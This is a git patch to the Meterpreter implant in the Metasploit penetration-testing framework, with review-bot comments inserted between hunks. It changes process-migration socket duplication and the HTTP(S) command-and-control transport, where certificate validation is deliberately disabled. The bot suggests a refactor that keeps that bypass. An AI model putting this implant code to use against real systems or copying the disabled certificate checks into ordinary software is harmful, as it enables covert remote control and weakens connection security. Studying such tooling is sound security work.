From c1935eda062cf413ade122dfcdefd3ab5876d718 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Tue, 28 Jun 2011 17:25:37 +0000
Subject: [PATCH] Re-add the missing SendRequest, make migrate work

git-svn-id: file:///home/svn/framework3/trunk@13048 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../common/arch/win/i386/base_dispatch.c | 8 +++++---
 .../source/meterpreter/source/common/core.c | 20 +++++++++++++++----
 .../meterpreter/source/server/server_setup.c | 4 ++--
 3 files changed, 23 insertions(+), 9 deletions(-)

diff --git a/external/source/meterpreter/source/common/arch/win/i386/base_dispatch.c b/external/source/meterpreter/source/common/arch/win/i386/base_dispatch.c
index b03732baa7..cadd66b6ca 100644
--- a/external/source/meterpreter/source/common/arch/win/i386/base_dispatch.c
+++ b/external/source/meterpreter/source/common/arch/win/i386/base_dispatch.c
@@ -123,9 +123,11 @@ DWORD remote_request_core_migrate( Remote * remote, Packet * packet )
 if( !hProcess )
 BREAK_ON_ERROR( "[MIGRATE] OpenProcess failed" )
- // Duplicate the socket for the target process
- if( WSADuplicateSocket( remote_get_fd( remote ), dwProcessID, &ctx.info ) != NO_ERROR )
- BREAK_ON_WSAERROR( "[MIGRATE] WSADuplicateSocket failed" )
+ if ( remote->transport == METERPRETER_TRANSPORT_SSL ) {
+ // Duplicate the socket for the target process if we are SSL based
+ if( WSADuplicateSocket( remote_get_fd( remote ), dwProcessID, &ctx.info ) != NO_ERROR )
+ BREAK_ON_WSAERROR( "[MIGRATE] WSADuplicateSocket failed" )
+ }
 // Create a notification event that we'll use to know when it's safe to exit
 // (once the socket has been referenced in the other process)
diff --git a/external/source/meterpreter/source/common/core.c b/external/source/meterpreter/source/common/core.c
index a0e1b8a43c..b9052968c2 100644
--- a/external/source/meterpreter/source/common/core.c
+++ b/external/source/meterpreter/source/common/core.c
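Review bot: For the non-SSL transports the new `if` leaves `ctx.info` untouched, so whatever `ctx` held before this point is what the target process receives as its WSAPROTOCOL_INFO; the start of remote_request_core_migrate is outside the hunk, so whether `ctx` is zero-initialised there cannot be confirmed from this view. Either an explicit `else { memset( &ctx.info, 0, sizeof( ctx.info ) ); }` or a comment above the branch such as `// HTTP/HTTPS transports have no socket to duplicate; ctx.info is intentionally not populated` would make the intent visible to the next reader. The `BREAK_ON_WSAERROR` macro is now one block deeper, which only matters if it expands to something other than a plain `break` out of the enclosing loop; worth a glance at its definition, which is not in the hunk.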
@@ -1129,13 +1129,20 @@ DWORD packet_transmit_via_http_wininet(Remote *remote, Packet *packet, PacketReq
 hReq = HttpOpenRequest(remote->hConnection, "POST", remote->uri, NULL, NULL, NULL, flags, 0);
- if (hReq == NULL) { dprintf("[PACKET RECEIVE] Failed HttpOpenRequest: %d", GetLastError()); SetLastError(ERROR_NOT_FOUND); break; }
+ if (hReq == NULL) {
+ dprintf("[PACKET RECEIVE] Failed HttpOpenRequest: %d", GetLastError());
+ SetLastError(ERROR_NOT_FOUND);
+ break;
+ }
+
 if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
 InternetQueryOption( hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, &flen);
 flags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_UNKNOWN_CA;
 InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, flen);
 }
+ hRes = HttpSendRequest(hReq, NULL, 0, buffer, packet->payloadLength + sizeof(TlvHeader) );
+
 if (! hRes) {
 dprintf("[PACKET RECEIVE] Failed HttpSendRequest: %d", GetLastError());
 SetLastError(ERROR_NOT_FOUND);
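Review bot: The `hReq == NULL` block added to packet_transmit_via_http_wininet keeps the `[PACKET RECEIVE]` log prefix copied from the receive path, so failures of the transmit request will be mislabelled in the debug log; `dprintf("[PACKET TRANSMIT] Failed HttpOpenRequest: %d", GetLastError());` matches the function it sits in. The newly added `HttpSendRequest` can fail after `hReq` was opened, and nothing in the hunk releases that handle before the `break`; the rest of the function is outside the hunk, so confirm that the cleanup after the loop calls `InternetCloseHandle(hReq)` on this path (the same question applies to the receive hunk that follows). Separately, the context lines just above OR in `SECURITY_FLAG_IGNORE_UNKNOWN_CA` twice and, together with `SECURITY_FLAG_IGNORE_CERT_CN_INVALID`, switch off server-certificate validation on the HTTPS transport, so the packet sent by the new call is not protected against an interposed endpoint; the duplicate flag can be dropped and that decision deserves a one-line comment where the flags are set.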
@@ -1350,14 +1357,19 @@ DWORD packet_receive_http_via_wininet(Remote *remote, Packet **packet) {
 dprintf("[PACKET RECEIVE] HttpOpenRequest");
 hReq = HttpOpenRequest(remote->hConnection, "POST", remote->uri, NULL, NULL, NULL, flags, 0);
+ if (hReq == NULL) {
+ dprintf("[PACKET RECEIVE] Failed HttpOpenRequest: %d", GetLastError());
+ SetLastError(ERROR_NOT_FOUND);
+ break;
+ }
+
 if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
 InternetQueryOption( hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, &flen);
 flags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_UNKNOWN_CA;
 InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, flen);
 }
-
- if (hReq == NULL) { dprintf("[PACKET RECEIVE] Failed HttpOpenRequest: %d", GetLastError()); SetLastError(ERROR_NOT_FOUND); break; }
-
+
+ hRes = HttpSendRequest(hReq, NULL, 0, "RECV", 4 );
 if (! hRes) {
 dprintf("[PACKET RECEIVE] Failed HttpSendRequest: %d", GetLastError());
 SetLastError(ERROR_NOT_FOUND);
diff --git a/external/source/meterpreter/source/server/server_setup.c b/external/source/meterpreter/source/server/server_setup.c
index 0df14b55aa..e3a17950f8 100644
--- a/external/source/meterpreter/source/server/server_setup.c
+++ b/external/source/meterpreter/source/server/server_setup.c
@@ -4,8 +4,8 @@
 char * global_meterpreter_transport = "METERPRETER_TRANSPORT_SSL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
 char * global_meterpreter_url = "https://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/\x00";
-int global_expiration_timeout = 0xb64be661;
-int global_comm_timeout = 0xaf79257f;
+int global_expiration_timeout = 0xb64be661;
+int global_comm_timeout = 0xaf79257f;
 #ifdef _WIN32
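Review bot: The `hReq == NULL` block added to packet_receive_http_via_wininet is a line-for-line copy of the one added to packet_transmit_via_http_wininet in the previous hunk, and in both functions it is followed by the same five-line HTTPS option block; the ordering bug this commit fixes (checking `hReq` only after it had been passed to InternetQueryOption) is exactly the kind of drift that duplicated sequences invite, so the open-plus-options step belongs in one static helper. The sketch below returns NULL on failure and leaves `SetLastError(ERROR_NOT_FOUND); break;` at each call site so the loop structure is untouched, and it uses its own locals for the security flags instead of reusing `flags`/`flen`, which the hunk shows being overwritten by InternetQueryOption. Behaviour, including the certificate checks the flags switch off, is unchanged. Both enclosing functions start and end outside their hunks.
```c
/* Open a POST request on remote->hConnection and, for the HTTPS transport,
 * apply the security-flag overrides used by both packet paths.
 * Returns NULL (after a dprintf) when HttpOpenRequest fails. */
static HINTERNET open_post_request(Remote *remote, DWORD flags)
{
	HINTERNET hReq = HttpOpenRequest(remote->hConnection, "POST", remote->uri, NULL, NULL, NULL, flags, 0);
	if (hReq == NULL) {
		dprintf("[PACKET HTTP] Failed HttpOpenRequest: %d", GetLastError());
		return NULL;
	}
	if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
		DWORD secFlags = 0;
		DWORD secLen = sizeof(secFlags);
		InternetQueryOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &secFlags, &secLen);
		/* NOTE: this disables server-certificate CA and CN validation for the session. */
		secFlags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID;
		InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &secFlags, secLen);
	}
	return hReq;
}

/* … call site in packet_receive_http_via_wininet (the transmit path is the same shape) … */
	hReq = open_post_request(remote, flags);
	if (hReq == NULL) {
		SetLastError(ERROR_NOT_FOUND);
		break;
	}
	hRes = HttpSendRequest(hReq, NULL, 0, "RECV", 4 );
	/* … unchanged: hRes error handling … */
```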